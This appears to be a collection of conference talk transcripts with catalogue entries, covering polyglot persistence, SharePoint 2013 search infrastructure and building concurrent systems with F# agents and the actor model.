Let's say I'm creating an application from a consultant firm. And we have an employee database. And the seller comes along and wants to find a consultant that has experience with F-sharp in two different projects. Has a five-year experience as a consultant. Has these specific types of certifications. So in this query, it's possible to run in a search engine. It's possible to run in a relational database, but that join is hard to write, hard to read, and heavy to execute. If you use a graph database, that query is easy to write and read and really, really fast to execute. So we choose a graph database. The problem though is that this architecture doesn't look that very good. The applications have to talk to three different databases, and the databases has to know of each other. So let's remove those relations. And let's remove the relations between the database. And reorganize. And we have this. So we have three databases, but two of those databases doesn't do anything. They need some data. In order to give them data, we add an persistent event store. So every time there's a change to the data, it's written to the key value store and the event store. And we hook up these other databases to that event store in order to those so they can get some data. And it's a good thing if this event store is persistent, because if we have to take down the search engine and add a new hard drive or something, we can plug it in and retrieve all events since last time we were connected. Or if you want to add a completely new database, we can just play back all the events and fill up the new database. That's what we have to do in order to meet these requirements. The customer has a need to generate reports. Suddenly the data warehouse people or statistics or economics comes along and they have bought this wonderful reporting tool and they want statistics. Problem is that we have a search engine, a key value store and a graph database. And there's no reporting tools that talk to these data sources. And there's no problem. We just add a new listener to the event store, a relational database. And there are several positive things about this. But first thing is that it's easy to add and it's easy to fill up with data because we have all the changed events. And the second thing is that these folks can do whatever they want with this relational database because our application isn't dependent on it. So they can run heavy reporting jobs in the middle of the day while our application is in production. We are not affected by it. So that is polyglot persistence. At least it's one way of implementing polyglot persistence. And we know there's no silver bullets in anything. Nothing programming language, nothing operating systems, nothing libraries and not in databases. Relational database may seem like a silver bullet, but it's not. It's not the best solution for every problem. You pick the database that satisfies the needs you have there and then and you build an architecture that allows you to expand and accept new requirements from the customer. Because those requirements will come. Thank you. Thank you. Microsoft moving into hardware business because you saw that the hardware requirements they have to implement enterprise search is huge. I'm going into that. To simplify our task in the project, we needed to index 40 million documents and to persist the 10 queries per second. I used a query from our middleware into the index is one query. And that comes from a user texting in a search box and hitting the search button. 
But before I continue, how many of you work with SharePoint today? And how many of you work with Search? Some of you. Good. All right. Let's continue. So to implement search or create an infrastructure that supports these needs, we need a web frontend. That is where we present our search results, where we present the search box. We need some indexes. That's where the system persists the index or creates the binary index of the content that we want searchable. We actually need four of these. There's a maximum limit that SharePoint defines. The maximum limit is 10 million documents per index. We also need to get the documents from the source system. A source system can be either SharePoint itself. It can be file systems. It can be databases. And it can be any custom content sources that you create. And of course, also web pages. There's a new component in SharePoint 2013. That is analytics. And that is a process that can give you information about how people are using the system and especially search. We need some admin components. We need the query processing. That's where the logistics or administration of the query happens: each query has to ask all the indexes and has to get the answer from all the indexes. And it manipulates it and sends it to the server. That's the query processing unit and what it does. One more admin component. It's a search admin. For documents to come into the index, they need to be handled in some way. They need to be processed. They are converted from binary data to a text form that the index can store. And that's done in the document processing units or components. And we have a lot of them. That makes us able to process from 50 to 100 documents per second when we do a full speed on the crawl. And we need a lot of databases. Now we have a setup that can handle 40 million documents. In theory, it can handle 10 queries per second. But if one of these nodes disappears, the whole system is down. So we need redundancy. We need another web frontend. We need a new set of indexes. We need crawling and analytics. And of course, the document processing components. Databases as well. So basically to handle 40 million documents, we need 12 nodes. In our project, we used virtual machines, which were hosted on two physical servers. What we also did was split the two parts of the farm into two separate data centers, which means that a whole data center can have its power cut off. And such a system will still be up and running and working fine. Both with updating the new content and also giving results from queries. We also added a new business middleware, which is called Compario Front, which adds some additional functionality to search. We have done some content enrichment, where you can do some custom changes to documents coming into the index. Yeah. Basically, so the infrastructure and investments. We have 12 VMs. For each VM, we have eight cores, which basically results in 96 cores. A lot of memory. We started off with 16 gigabytes of memory, but we had to double that to get the performance that we needed. We need a lot of disk. System disk and data disk. The data disk contains the log files and binary index. That has actually improved dramatically from the last version of FAST, so that's quite good. And a search system is also very IO dependent. So per indexer, the recommendation is 200 IOPS. So that basically means we need a system that can handle at least 1600 IOPS. That's quite a lot. This is also a big improvement from the last version of Enterprise Search in SharePoint.
In addition to this, we need physical servers. We have two. We need the database servers, load balancers. We need a good SAN system and someone that can set that up properly. Domain controllers and other networking. You need a lot of licenses: SharePoint, SQL, Windows, Visual Studio, and in our project, you also needed Compario Front licenses. And to properly work with developing on SharePoint, on this SharePoint search solution, you also needed a development environment. That is a single VM with four cores and 16 gigabytes of memory. We had a QA system, which was two nodes, the same size as the production. We had a test system with a single node, the same specs as the production. And we had a user acceptance test environment, which was exactly the same as production. So a lot of hardware. We had two extra physical servers to handle the UAT system, and the rest of the virtual servers were placed in a separate development environment. So, key points that we have learned when working with Search in SharePoint 2013 and doing more than just setting it up and turning on Search. That means that you have to customize how Search works for the customer's needs. We need a lot of funding. We see that. And at the same time, a lot of time. In this project, it was quite special because we had a TAP project. We worked on a system which was in beta mode and no documentation whatsoever. And we saw that you really need documentation working with SharePoint. We didn't have that. But we had a good network. As I work in Compario, we have a good relationship with the old FAST, which was bought by Microsoft and who still develops the Search for SharePoint. And we really needed to pick the ones that we knew worked with us and to get the information that we needed. We saw that automated deployment was really effective and it helped us a lot. That made us able to just deploy the functionality that we have now and continue working on developing new stuff. It saved us a lot of time. You can improve performance dramatically by adding more CPU to the Search servers. Adding memory. We saw that by doubling memory, the search query time was reduced quite dramatically. Optimize this queue and have load balancing that works. We had an issue with distributed cache where we had a lot of timeouts. We had to tune the cache to be bigger than the default. That might be because you have a lot of users on the system. The last one, you have to know your antivirus. Turn it off completely on the servers or at least exclude the index folders. That will hit hard on query performance. That's it. Any questions? We are at the Compario stand. Talk to us. And, bear time. Thanks.
|
Talk 1: Cross-platform mobile gaming with MonoGame - Rune Andreas Grimstad Talk 2: Teach the kids to code - Simen Sommerfeldt Talk 3: Learn from the history - Thomas Pedersen Talk 4: Polyglot persistence - Ole-Martin Mørk Talk 5: What we have learned about SharePoint 2013 and Enterprise Search - Tallak Hellebust
|
10.5446/51514 (DOI)
|
Well, yeah, welcome. This talk is about building clean and cohesive concurrent system with F sharp agents. My name is Simon and for those of you who can't really see me, this is my face. I am a father of two and I'm from Denmark and my formal education is in distributed real time systems. I don't really use that. I have my day job where I do software and business intelligence consultancy at D60. And if you need to get in contact with me, you can just come up and ask me or then I'm SS Boys on Twitter and LinkedIn and GitHub. So why should you care about these F sharp agents? Well, as you probably know, for the last couple of years, the processor frequency has not really been increasing that much. They seem to have stranded somewhere between two and three gigahertz. So the free lunch that we have been enjoying for the past couple of decades where without doing anything, our application performance would improve just by having our users upgrade the machines. That is not really happening anymore. But what is happening is that the number of cores is increasing. So now people typically have at least a dual core, maybe a quad core. If you're in a server, you might even have 16 cores. So in order to utilize these new CPUs, we have to do parallel execution. And the problem is that the usual shared memory model we have with locks and semaphores. And so it gets kind of hard as soon as you have multiple threads, it almost gets incomprehensible to regular human beings. And you get into nasty situations like this Brazilian live lock where you have threads not able to move because they're all waiting on each other. And you've probably all been there where you have race conditions and suddenly when you debug it, it works. But then when you don't debug it, it doesn't work. And all those things just coupled with the thing that we have to do asynchronous execution now because we are doing a lot of I.O. We all, pretty much all applications, is calling some kind of network service. And the reason why that is a problem is that the amount of clock cycles it takes to do I.O. increases tremendously when you get away from the CPU and the RAMs. And so when you access this kind of work, you're wasting sometimes 240 million cycles on your CPU if you're just blocking the threads and waiting. So all in all, it's pretty clear that in order to utilize the new CPUs, we have to have a better programming model. And there's a couple of options here depending on your situations. What we'll be talking about is Actors. But there's also something called Software Transactional Memory where you remain with the shared memory model. But the memory is encapsulated as a database, pretty much. You have transactions where you, when you perform a memory change, it just works as a transaction and it's an optimistic concurrency which means that you can have multiple parallel transactions running. Then you're assuming that everything would go all right, but if it doesn't, then you'll just retry the transaction and you could retry indefinitely, but often you will just fail the transaction at some point if it keeps failing. The other option is the Actors where you're using message passing. And that's a shared nothing memory model. So it's good for problems where you are able to separate your problem into small bytes. So you have these separate Actors which do their own thing. So the Actor model, what is it? Well, it's actually a mathematical model of concurrent computation which was invented by Professor Carl Hewitt at Stanford University. 
And you can see him here looking all cool with his crazy physics stuff and his blackboard, and it's actually, the Actor model is actually modeled after how things work in physics. And Carl Hewitt sees Actors as the universal primitive of all computation. So everything is an actor and they embody processing, storage and communication. The processing will be taking the message and then doing stuff with the message. And the storage is the state that you have inside the agent and the communication is the way that you get those messages around. So you send messages to different Actors. So what is an Actor? Well, it's an autonomous and concurrent object and it executes asynchronously. So it has this mailbox where it receives its messages through and then the messages will get consumed in a loop. And in the loop you will modify some state perhaps, you don't have to, but that's often what happens. But the act of actually receiving the message is asynchronous. So you can receive the message and if no message is available, you're not actually utilizing a thread or you're not blocking a thread. So you can have a lot of these Actors on one thread. The actor has the mailbox and that mailbox has an address, or the actor has an address, and you can send the message to it and if you're familiar with Erlang, in Erlang they're called process IDs and then you have a machine name and a process ID so you're able to send a message to that process on that machine. And that's how it is in the Actor model. We will see that it's a bit different in F#. So what can an actor actually do? Well it can receive and process these messages. It can create new Actors which can be useful in certain scenarios. Typically when you have, you run with something called supervisors where you have the supervisor which is in control of different Actors and if one of those Actors fails, it will create a new Actor in order to, well, heal the system I guess. And of course the Actors can send messages to each other and they can designate how they want to handle the next message. So that's what makes them good at modeling finite state machines because you have a current state, then you receive a message and then you transform into a new state and depending on what message you receive, you can go into different states and we'll see later how that works in F#. So these messages, they are pretty essential to the whole thing and there are a couple of things worth noting though: the order of receipt of the messages is not guaranteed in the Actor model and also each message will be delivered at most once. That means that you can actually lose messages. But the reason for this is that it goes back to the fact that it's a mathematical model and in order to reason about the system and actually being able to describe them mathematically, it gets easier when you have these relaxed properties. So you just have to live with that I guess. Also when one message is being processed at a time, you kind of have implicit synchronization because when you only have one change to the state at once, you obviously have some sort of synchronization. So what about the F# agents? Well, they are similar to Actors but they are not exactly the same.
They are built on F# async so they are also asynchronous and they run on a thread pool in .NET and you can have these thousands of async agents per thread because as I said when they are not doing anything, when they are just waiting to receive a message, they are not taking up any threads, they are just sleeping basically in the background waiting to get the callback. So one difference is that messages are received in order in a sender receiver pair. So if you have a sender and a receiver, if the sender sends two messages, the second message is guaranteed to be delivered after the first message. Obviously if you have different actors sending to the same actor, it can be in-between depending on who gets to put a message into the mailbox. So what are some of the differences to Erlang and Akka and the Actor model? Well, it's not distributed so the address is the identifier of the object in your process. Also messages are delivered exactly once, that's just because I mean it's just putting a message into a queue in memory so there's no network which could duplicate the messages. Also there are no built-in durable mailboxes, and durable mailboxes are actually not something that is part of the Actor model but it's something that is in Akka. Maybe I should mention that Akka is a library for Scala, which is a programming language on the JVM, and what durable mailboxes means is that if the actor crashes, it doesn't lose all those messages already in the mailbox. That's what happens in F-sharp and what actually happens as a standard also in both Akka and Erlang. Also, it doesn't have built-in supervision support, so this whole supervision tree thing where you have some supervisor at the top which has control over different child agents. There's no support for that in F-sharp agents. But how does it look? I don't know why I suddenly think I'm fitting. Anyway, this is what's called a discriminated union. Is everyone familiar with F-sharp already? Or sort of. I'm just going to explain it. This is a discriminated union and you can think of it like an enum on steroids, I guess. The way it's actually implemented if you wanted to do it in C-sharp, you would do a base class called calc operations and then these are subclasses where the properties or public fields are just these things and then of course it's immutable so they will probably be read-only public fields. They can have different values and if you wanted to have multiple values inside this message you just append an asterisk and then another type. So the add and the subtract have an integer value and the total has what is called an async reply channel which is of type integer. So that just means that it carries a channel through which the agent can communicate back to the caller or to the original sender of the message. This is the mailbox processor and that's actually what the agents are called in the standard library in F-sharp. They just happen to be called agents. Typically you see people type-deffing a new type called agent which is just an alias for the mailbox processor. I'm not sure why that happened but it's just a convention I guess. To this Start method you hand in another function and if you're familiar with C-sharp that's just like a lambda where you have one parameter which is the inbox, so the mailbox of the agent, and then you have this recursive loop.
It could also just have been a regular loop with mutable variables so your total would have been a mutable variable but I like to stay in the functional world where you won't have any mutation. So what you do is you have this async block which means that everything inside this can do special things because it's an async block. So when you do this receive this won't block the thread because it's an asynchronous call but this let bang, let is the way that you declare a variable or an identifier and the let bang means that well it's like await in C-sharp so it will yield and then whenever something happens it will be called back by the runtime and message will become that message that it receives sometime in the future. So now we do a pattern match on the message and we get either an add, subtract or a total message that corresponds to what we have up here and if it's an add we take the current total and we increment it and subtract we decrement it and if it's a total then we get this async reply channel and to that we reply with the total and then we just loop around there's nothing to see here that's just loop and total so we just keep the current total and then down here we're just starting the recursive loop and because F# supports tail recursion this won't blow the stack because by the compiler this will pretty much just be converted into a loop, a regular loop and that's well because it's tail recursive it's able to do that. Also down here we actually use the agent so this start method returns an agent and on that agent you can then post a message and you can post well two messages so first we post an add message then we post a subtract message and those have the values 8 and 3 and then down here we post a total message so there you use this post and reply where you hand it a lambda or a function which takes a reply channel and then you give that reply channel to the total so this means that the mailbox processor or agent receives this channel up here and then the whole result of this is that we get the value total back which is 5, 8 minus 3. This will actually block so if the mailbox processor has a lot of messages this will block until we get a reply on this particular message that we send it but there's also an asynchronous version of this where you are able to receive the value or the reply in the future and you won't block the thread. So anyone have any questions for what we saw until now? Yeah the mailbox processor or agent is running in its own thread so this would be whatever the process thread and this would be some thread pool thread so it won't block that thread so that's how it works. Okay I have a couple of demos where we can see some of the stuff that you can do so what we have here is a small auction system where you have two types of messages you have the message that you send to the auction agent and then you have the messages that you send to the bidder. You could have chosen to use the async reply channel here and just have it return those bidder messages but I chose to model both of them as agents just to show how you would typically do it when you have multiple agents and if you want to adhere to the actor model more because actually this whole thing of channels is kind of breaking with the actor model.
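Before the auction walkthrough continues, here is roughly what the calculator agent just described looks like as one self-contained snippet. It is reconstructed from the description rather than copied from the slides, so names and details may differ slightly:

```fsharp
// The message type: a discriminated union; Total carries a reply channel.
type CalcOperations =
    | Add of int
    | Subtract of int
    | Total of AsyncReplyChannel<int>

// The common convention: alias MailboxProcessor as Agent.
type Agent<'T> = MailboxProcessor<'T>

let calculator =
    Agent.Start(fun inbox ->
        // Tail-recursive loop; 'total' is the agent's state.
        let rec loop total = async {
            let! message = inbox.Receive()   // asynchronous, does not block a thread
            match message with
            | Add n       -> return! loop (total + n)
            | Subtract n  -> return! loop (total - n)
            | Total reply ->
                reply.Reply total            // answer the original sender
                return! loop total }
        loop 0)

calculator.Post (Add 8)
calculator.Post (Subtract 3)
// Blocks until the agent replies on the channel; prints 5.
printfn "%d" (calculator.PostAndReply Total)
```

PostAndAsyncReply is the non-blocking variant mentioned at the end, where the reply arrives asynchronously instead of blocking the caller.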
So what we have here is just we create a new agent and to the constructor we also hand in this function which has the inboxes parameter and then we just do some stuff for some performance counting and we do a try receive on the message and this is 500 milliseconds so if it doesn't receive any messages in 500 milliseconds it will return an option of none and the option is a type which can either be nothing or some value so it's sort of like a nullable in the Cshar which is much better because the value is not defined I guess. So when we receive this message we do a pattern match on that and the winner and you'll notice that the loop here has two so this is basically the state of the agent that has a bid price and a winner and perhaps we don't have a winner yet because we haven't received any messages so the winner is also an option and then the bid price is whatever people bid. So we match on the message which is an option of auction message and we match on the winner which is an option of agent of bid on message so that's this one and if we got a message and if we are still have a valid running auction then we go in and take a closer look again so if it's a bid and we have a winner and the ID of the bidder is the same as the one who is currently the winner we just tell him why are you bidding again you're already the current winner. Obviously if it's like eBay you get to increase your bid but I just chose to model it like this and here you get to do a bid but in this case the bid price is too low so that's what you get told by the auction so this is a bidder message and here we get a bid and it's a valid bid because this clause up here ensures that if the bid price was equal or low we would get in here but now we get in here which means that we have a new highest bidder which is that guy and then we can tell him okay you are now the new highest bidder and what we do here is we do the loop again with the new bid so that's the new bid price and then we add an option with a sum value so that's it can either be none or some of the type so some ID and agent so the winner is actually a tuple with the first argument being a string to identify it so you can call the bidder whatever name you want and then the actual agent that you want to send the message to. 
If we didn't receive a message, or actually even if we did, but I don't think we would actually get down here, so yeah, if we receive a message after the time has gone, so in the 500 millisecond window after the time might have gone, we could get in here and then we are told that the auction ended with a winning bid of so-and-so. We don't really do anything with the message, that's why we match with an underscore, and we take the current winner and we say okay you won and we tell the winner yeah you won and down here we have no winner and we don't care about the message and the auction has ended so we say okay the auction ended with no bids placed and this is pretty much a standard auction obviously you could extend it with much more logic but it will do for now and down here we just start the loop with the start price which was a constructor or a function argument and then the auction end time which we just actually just capture because we don't need to change the auction end time so we just capture it down here okay so the oops the bidder is somewhat like the auction but has some different parameters and we just calculate the next bid and then we send that bid along with our identifier and our inbox so that is the agent and then we do a receive on that message and if we get told that the bid is too low then we will just loop around and do the next bid or if we are the highest bidder we will just sleep for some random time just to celebrate that we are currently winning and down here we are creating an auction and here I am using a feature of F# which lets you type your floats so you won't be able to say US dollars plus Danish kroner or Norwegian kroner without having a converter available so that is very nice if you are dealing with SI units and stuff like that and other than this, zero, so that is the start price of the auction, we also just tell the auction to end in 15 seconds and we start the auction and then we spawn 100,000 bidders and we get a bid price and we create the bidder and we start the bidder and then we print out all bidders have been started and then this happens, see, it's just compiling, so you see that we are receiving bids from different kinds of bidders and you actually see some of them, since we are creating 100,000 bidders, they actually start bidding before all of the bidders have been created, obviously you could fix that by not just starting them right away and that is basically it, the different threads, you will only see a couple of them but that is because we only see when we actually get a new highest bid and we get a message throughput of 60,000 messages a second so that is pretty fast and I think if I wasn't running in a VM it would probably be a lot faster so that is how you do an auction or could do an auction. Maybe I should just show you what happens if we comment this in, so this is when you receive a bid but it might not necessarily be a winning bid, so just any bid that we receive, so you can see that yeah it is spamming and it makes the throughput of messages drastically less because we are using a lot of time on printing out to the console, you will see it now suddenly only 640 messages per second so you probably don't want to write to the console that much. Yeah. Yeah it is.
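The "typed floats" used for the bid prices here are F# units of measure. A tiny illustration — the currency units and the exchange rate below are just made up for the example:

```fsharp
[<Measure>] type usd   // US dollars
[<Measure>] type nok   // Norwegian kroner

let startPrice = 0.0<nok>
let bid        = 150.0<nok>
// let wrong   = bid + 10.0<usd>   // does not compile: cannot add nok and usd
let rate       = 0.17<usd/nok>     // a made-up conversion rate
let inDollars  = bid * rate        // 25.5<usd>
```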
That is one of the nice things about pattern matching in F#: it will guarantee that the match is exhaustive, and depending on how you configure Visual Studio you can get a compiler error, but by default it is just a warning which will tell you there is some case that you did not handle. And it is exhaustive because we only have one type of message we can receive, which was this bid, and we are handling the case where we don't care what the first part is and we care what the second part is, and actually this makes it exhaustive since we only have one bid message. But down here you can see, if I go in and I comment out this part, then it should tell me, yeah, incomplete pattern matches on this expression, for example the value "you won" can be received. So that is a nice hint that you forgot some case. Yeah. Not without doing the stuff yourself, so you would have to do I guess sockets or some other way to communicate. Yeah it is true that you could have done that. Let me see, but how would you communicate between the functions, I mean if you had one function and you had another function, so if these were just functions I am not sure how I would communicate between them, that is what the messages are for I guess, but maybe I am mistaken. Alright, any more questions for this part of the talk, then let's take a look at some other examples. So one of the things that you can do with an agent, and obviously you could do this in different ways but I think it is a pretty smooth thing to do, is you can create a batch processor agent, so say you are receiving, yeah. Yeah sorry. So this is actually just creating a class and this is a pretty nice thing because this means that we can use the agent from C sharp without ever knowing, and it has full interoperability. And what we have down here is an event which will be triggered whenever a batch is created, and this attribute means that it will be converted by the compiler into a standard C sharp event as we know them, and we can also encapsulate our agent and have methods which make sense in the domain of whatever we are doing, so you can hide the fact that you are actually posting messages to an agent, so you just get a synchronous object or synchronous class.
What we are doing here is just creating this agent and then we have this function. Maybe I should just say what the parameters are: so that's the size of the batch, that's the timeout of the batch, so if some time has gone and we have not received the batch size we will just create a batch anyway, and this is an optional synchronization context which we pass in in order to be able to trigger the event on some other thread, so that's useful if you are doing stuff with UI. So with this function we can just trigger the event whenever we have a batch. So as you can see there is some sort of pattern here, right, we pretty much always have this loop thing and we receive the message and then we do stuff with the message, and in this case we are checking for batch size and then if it's the batch size we will take the messages and we will reverse them, because in order to get them in the right order you have to reverse it, and then we will trigger the event, so that they will trigger this event down here, and here if we receive a message, so that's just increasing the current batch without actually getting to the final batch size, and this is if we have messages, so if we have received something in the time period and then we have a timeout, then we will trigger the event. Okay so how would you do something like this from C#? Well it's quite easy because since it's just a regular class we can just new it up as we would, and it gets to be generic over the type so you could do whatever you wanted here, so this is the type of what you are batching on, so this could have been whatever, maybe it was a class containing some information, and then we just new it up and this is just a small extension method which creates an F# option, which is a type that you get when you use F# from C#, and we subscribe to the event and when the event happens we take a look at whatever happens in this batch, so we will get an array of chars, this is the messages that we received which were put into the batch, and then we just add it to some UI element, and yeah we just push stuff into the agent when we press a key. So when running this, if we wait for a while, it's 2000 milliseconds, so you can see nothing is being produced when no messages are received, that was the third clause I think, fourth maybe, and then if I do this you can see that, okay, that was what we, and then we actually receive some stuff, and I'm not sure exactly why this happens, as you can see this is not the correct order I think, I think it's actually something with the key up and I'm not sure, I wasn't able to find out exactly why the order changes, so that's kind of weird, but you can see that, well, whatever, and if we get to nine characters we'll just continue creating batches. So you could imagine that maybe you're receiving a lot of messages and you need to insert stuff into an SQL server and then you want to use bulk insert, so you have this batch and you don't want to fall behind, so you at least want, once every 30 seconds, you want to insert into the SQL server, but if you get say 10 messages you want to insert those as a bulk, and that's pretty much it, and what's worth noting here is this way that you can encapsulate your agents so that you can't really see that it's an agent and you can use it as you want from C sharp. Any questions?
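A rough sketch of the pattern being described: an agent hidden inside an ordinary class, with a CLI event that fires when a batch is full or the timeout expires. This is reconstructed from the description, not the speaker's exact code, and it leaves out the optional synchronization context:

```fsharp
type BatchProcessor<'T>(batchSize: int, timeoutMs: int) =
    let batchEvent = Event<'T[]>()

    let agent = MailboxProcessor<'T>.Start(fun inbox ->
        let rec loop (batch: 'T list) = async {
            // Wait for the next item, but at most timeoutMs milliseconds.
            let! msg = inbox.TryReceive timeoutMs
            match msg with
            | Some item when List.length batch + 1 = batchSize ->
                // Batch is full: publish it (reversed to restore arrival order).
                batchEvent.Trigger((item :: batch) |> List.rev |> List.toArray)
                return! loop []
            | Some item ->
                return! loop (item :: batch)
            | None when not (List.isEmpty batch) ->
                // Timed out with a partial batch: publish what we have.
                batchEvent.Trigger(batch |> List.rev |> List.toArray)
                return! loop []
            | None ->
                return! loop [] }
        loop [])

    // Looks like a normal .NET event from C#.
    [<CLIEvent>]
    member _.BatchProduced = batchEvent.Publish

    // Domain-friendly method that hides the Post to the agent.
    member _.Enqueue(item: 'T) = agent.Post item
```

From C# this is just another class: new it up, subscribe to BatchProduced, and call Enqueue.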
Okay now the next one is where we get into the more interesting parallelism. This is an example created by Tomas Petricek, who is an F sharp MVP, who actually, if you want to know more about F sharp, offers courses so you can have him teach you how to code F sharp. This blocking queue agent is something he wrote which is basically like a blocking queue, but it's an agent, so that means that it gets to be asynchronous, so you can insert the messages, or the items, into the queue asynchronously so you're not wasting time. So what we have here is we have an empty queue, and when you have an empty queue it only makes sense to receive add messages, so what we do is we scan through the messages, and how scan differs from receive is that when we receive a message which we didn't really care about it gets dropped, with scan we leave it in the queue and then we jump over it and we only match on those that we care about. So this means that if a get message has been sent it will still stay in the queue, so maybe we already received get messages and then we receive an add message, then the add message will be processed first and then the get message will be processed afterwards, even though it was actually in front in the queue, and then when we receive a message we transform into another state which is a non-empty queue, and here we add and get, so I'm not going to go into this but it's just adding stuff to the queue which is up here. And here we are actually using the blocking agents to do an image pipeline where we load in an image from the disk and we scale that image, then we do some Gaussian noise stuff on it and then we display that image in the UI. So we have up here, we just load the image, then we add that image to the blocking queue agent, here in the scale we load images from the queue, and this is where we get the utilization of it being async, because in case we hadn't loaded any images yet this won't just stand there blocking a thread or something, it will just wait asynchronously, so if we had other parts of our application it could utilize the thread pool better, and when it has scaled it, it will add those images to the scaled images agent, and then the filter part which does the Gaussian thing will get it from the scaled images, filter it and add it to filtered images, and then the display one will do the same, just get them from filtered and then it will display it in the UI, and down here we start each of these, so this is actually the agent part, these are just regular asynchronous workflows, so the agent part is up here, and then we start these three things and we run synchronously on the display image, and that's just so that this operation doesn't just fall through basically, so that we block this thread that we started the process on. And if you compare it to the way that you might do it with tasks, it looks pretty similar, but there is some stuff that you have to handle when you're doing it with tasks, so let's see if I can find it here, this is pipeline, so we start some tasks and this is much code, but then we have these functions and inside those we work on a blocking collection and we do some of the same stuff, but we also have to do handling of exceptions regarding whether or not we cancel the execution; that is actually handled for us with agents, it actually automatically handles cancellation tokens, at least in this scenario, there are some other scenarios where you have to use it, and the reason is that every time
it loops around, it checks these cancellation tokens by itself. So if we take a look at how that works with regards to performance, if we try out the message passing, so that's the blocking agent, you'll see that we'll end up somewhere around 60 milliseconds for each image, it's just running in a loop with those three images, and we get similar performance with the pipeline stuff, see, exactly the same actually, and then if we do it sequentially we'll see that we actually got something out of doing it message passing and pipeline, so you can see now it pretty much doubles the amount of time of processing each image. So what we are supposed to take from this is just that we can get similar performance characteristics as using tasks, and at least in my opinion, for this particular problem, I think it's easier to write it with the agents simply because they do this error checking and cancellation checking for us, and I think it doesn't get much easier than this considering what we are doing, I mean we are just loading in images and distributing them through different workflows, and then we have these methods which are used in both the task one and this one which is the messages, sorry, the methods which actually do the changes to the bitmaps, and then, yeah, sorry, yeah, sure, oh yeah, I gotta remember that every time I change, so okay, so yeah, and of course I'll put all this stuff up on GitHub so you can grab it from there, and well, that's about it for this one, anyone have any questions for this particular example? Okay, so I mentioned this thing that modeling state machines is something that agents or actors are pretty good at, and we saw it already in the previous example with the empty queue and the non-empty queue, but I thought that it got a bit cluttered, so I wanted a simple example which just shows this thing with the transitioning between the states, and this is the Border Gateway Protocol. It's the network protocol which is used to control the internet; the different routers on the internet communicate using this protocol. This is a simplification of it, I don't handle all the error cases, but if I had a lot more time I could probably have implemented it completely, but what we see is that we have some idle state which, if we go all the way down here, we have, this is the state that we start in, and now I don't think I need to explain this anymore, so we start with this idle state, and then, the way that it works in the Border Gateway Protocol is that each router gets configured with a table of endpoints that it needs to connect to, other routers, and in this situation we just have two routers and one of them is configured to connect to the other and one of them is configured to not connect to anyone. So what this means is that the one configured to connect receives a peer and the one who doesn't receive anything, so it will just receive messages, and the other one will post a do connect message to its peer, so this means that when we launch two of these, the first one with the peer will post a message to its peer and this one will receive the message and then it will do a connect and then it will check, okay, what message did I get, was it a do connect event? If it was, I will go into the connect state, which is what we have down here, and if it wasn't, then I'll just go back and do the idle, and that's how the protocol describes it, that if you receive anything else than a do connect message when it is in the idle state, you'll stay in the idle state and
then when in the connect peer we'll receive some we'll send an act to our peer now both of them has a peer because the first one got it configured the other one got it through the do connect event and now then we just send an act to that peer to just say okay we are connected as we should and if we receive an act message we go into an open send state and if we don't we go into an active state and that's just pretty much how it continues downwards here so we would transition between different states and in case you're in the open confirm state and you receive something which isn't a keep alive state then you actually can do a you should actually fail completely that's what the protocol describes that as we don't even transition back to another state you just fail and if you're if you're in the established so if you already have a connection you would go back to the idle state if you received a notification message so that's how you model the state machine where you transition between the states via messages so the transitions between the states are the messages and the functions here are the states and not really anything particularly interesting to see but you can see that you have these threads which were either of them will be in and you can actually see here that we are utilizing the asynchronous nature of it so we actually having both of them run on the same thread so you can see both the first one and the other one are running on the same thread and then at some point it it's not the same thing anymore here you can see it's thread six and thread five so just depends on which thread in the thread pool it gets woken up on and as last example I mentioned earlier that they weren't distributed but the thing is that that's the case with this the build-in ones in in F sharp the agents but there's actually a guy who has been creating a library where he's calling the F sharp actors where you actually have remote remoting and you have supervision but it's very early days so if you want to actually do actors distributed you shouldn't be using this I think you you you should probably using Erlang or Acca but it's maybe it's a glimpse into what we can have in the future in F sharp so how it actually works is you just spawn an actor on oh yes sorry yeah so you spawn an actor on some path on a remote machine or local machine and then you similar to how you did it with with the agent you receive in the inbox here is an actor you receive and you receive then you receive that message and you can say that okay this message was received and we got it on on this listener port this is actually a a ref cell is like a mutable variable but it's on the heap with yeah no no no it's just that's actually come to that right now this is the way that you register a transport so what kind of way do we want to do the remote communication and using here we're using what a high performance socket frame library called fracture which acts as the communication link so we register this transport and then we spawn the actor so in each of the processes we will be spawning an actor which will start listening on some port using a regular socket and then down here that's just handling stuff when we when we launch it so we can enter a message and we can send that message to a a remote a remote actor so yeah can you see this I know it's not and I don't even know if I can increase the size let's see if I can get lucky here maybe okay did that help okay so we can spawn one here so that's its own process and then we can set it to 
listen on port 40 and you can actually see here that we have supervision support, so we always have a system supervisor which controls any agent or actor which is spawned without a specified supervisor, and then we spawn the other one and we say okay you can listen on port 41, and then on this one we can send a message to the other one, so here we would write actor dot and then we have to actually define this, the transport, and I'm not sure if that's how it's supposed to be for the future, because I guess you will always have to somehow define how the transport is going to be for the actor to connect, so I guess it's probably how it's going to remain, so you have actor dot fracture and then you can specify, it could have been a remote machine but this is just the local machine, and we are connecting to port 40 and we are connecting to the actor or agent called R1 on this one, so this is the one called R1 and this is listening on port 40, this is called R2 and listening on port 41, and then we can send a message and hopefully it works, okay, sending message to endpoint, and over here we receive the message hello, so now we have remoting or remote communication. Yeah, the system supervisor, I guess it could still crash and then I don't think there was anything to save you, I'm not exactly sure how it works in Erlang, but I imagine that maybe it's even built into the VM, but I guess you could have it running as a system service or something like that. Unfortunately, when I tried it before I actually got it to crash and that showed you that it would get restarted, but it doesn't look like we are that fortunate now, but in case that this one would crash with an exception then the supervisor will restart it and you can then just send a new message, but I'm unable to get it to crash unfortunately. Okay, I think we are pretty much done now, if there's any questions feel free to ask. Alright, thanks.
|
As programmers we strive to create clean modular code with good separation of concern and little to no boiler-plate. But for the longest time however, multithreaded code has gotten the better of us by introducing challenging concepts such as semaphores, double checked locking, starvation, deadlocks, race-conditions and other unfortunate heisenbugs. With Carl Hewitts message-oriented actor model it all got much easier though. Languages like Erlang, Scala and F# offer a way to model both asynchronous, concurrent and parallel systems in clean cohesive modules which retains the maintainability of single threaded code, relieves the cognitive overload of traditional multithreaded programs while keeping their great performance characteristics. In this talk we will look at how F# agents and the actor model in general can help you create the simple concurrent applications you dreamed of. We will also see how they can help us solve other problems like optimizing for batch processing and even make distributed systems almost as easy as those that run on a single machine.
|
10.5446/51515 (DOI)
|
